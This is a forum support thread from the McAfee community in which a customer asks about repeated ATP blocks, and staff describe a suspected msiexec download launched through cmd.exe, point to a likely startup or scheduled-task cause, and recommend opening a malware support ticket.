cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 

blocking suspicious activity ATP

Hi everyone,

I would like you to see the related image since for a few days I have the following log in some machines, the ATP blocks but nevertheless, no matter how much the analysis is carried out, the behavior persists. I would like to know what may be causing it and how to eliminate it

4 Replies
yaz
McAfee Employee
McAfee Employee
Report Inappropriate Content
Message 2 of 5

Re: blocking suspicious activity ATP

HI @antivirusfnc 

Thank you for reaching out to McAfee Community.

From the provided details, it looks like you needed information on the file. 

I suggest you can raise an SR and provide us with sample as per KB below and we can share analysis on this one.

https://kc.mcafee.com/corporate/index?page=content&id=KB68030

 

Was my reply helpful?

IF yes, please give me Kudo.

If I have answered your query, Kindly mark this as solution so that together we help other community members. 

Re: blocking suspicious activity ATP

Hi, How are you?

 

This is the problem, I see the crash log in the console but I don't see any files on the workstation. How can I get this sample?

 

rfranci
McAfee Employee
McAfee Employee
Report Inappropriate Content
Message 4 of 5

Re: blocking suspicious activity ATP

Hi @antivirusfnc ,

Thank you for reaching us on community !

As per the image attached to the post, i see that cmd.exe is invoked to run msiexec command to download a file (appears to be a png file as per the screenshot) from a malicious site/ IPaddress .

I suspect that the infected machines must have a malicious file containing the command places in start-up location or must be running as a task at specified time interval.

As specified by @yaz  i would request you to open a malware ticket with support team to check on this.

Thanks,
- Rohit Francis

Re: blocking suspicious activity ATP

Hi, and Thanks you for your collaboration!!

 

The supported case was created (4-22251102041), it was updated by sending the procmon and MER logs from one of the affected machines.

I am waiting for more progress

 

 

 

You Deserve an Award
Don't forget, when your helpful posts earn a kudos or get accepted as a solution you can unlock perks and badges. Those aren't the only badges, either. How many can you collect? Click here to learn more.

Community Help Hub

    New to the forums or need help finding your way around the forums? There's a whole hub of community resources to help you.

  • Find Forum FAQs
  • Learn How to Earn Badges
  • Ask for Help
Go to Community Help

Join the Community

    Thousands of customers use the McAfee Community for peer-to-peer and expert product support. Enjoy these benefits with a free membership:

  • Get helpful solutions from McAfee experts.
  • Stay connected to product conversations that matter to you.
  • Participate in product groups led by McAfee employees.
Join the Community
Join the Community